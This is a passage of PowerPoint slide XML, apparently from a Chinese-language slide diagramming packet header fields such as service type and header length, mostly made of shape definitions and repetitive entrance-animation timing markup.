          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555875" y="1917700"/>
            <a:ext cx="2016125" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8291264"/>
              <a:gd name="T1" fmla="*/ 70788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8 h 434362"/>
              <a:gd name="T12" fmla="*/ 6 w 8291264"/>
              <a:gd name="T13" fmla="*/ 353932 h 434362"/>
              <a:gd name="T14" fmla="*/ 6 w 8291264"/>
              <a:gd name="T15" fmla="*/ 403988 h 434362"/>
              <a:gd name="T16" fmla="*/ 6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服务类型</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9" name="Freeform 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="1917700"/>
            <a:ext cx="1008063"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lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>包头长度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90" name="TextBox 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="466725" y="1557338"/>
            <a:ext cx="331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0</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8691" name="TextBox 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4167188"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15</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28692" name="TextBox 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8343900"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31</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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8680"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28680"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2868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4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28679"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28682"/>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17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28678"/>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17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28677"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28676"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="55" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="56" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28675"/>
                                        </p:tgtEl>
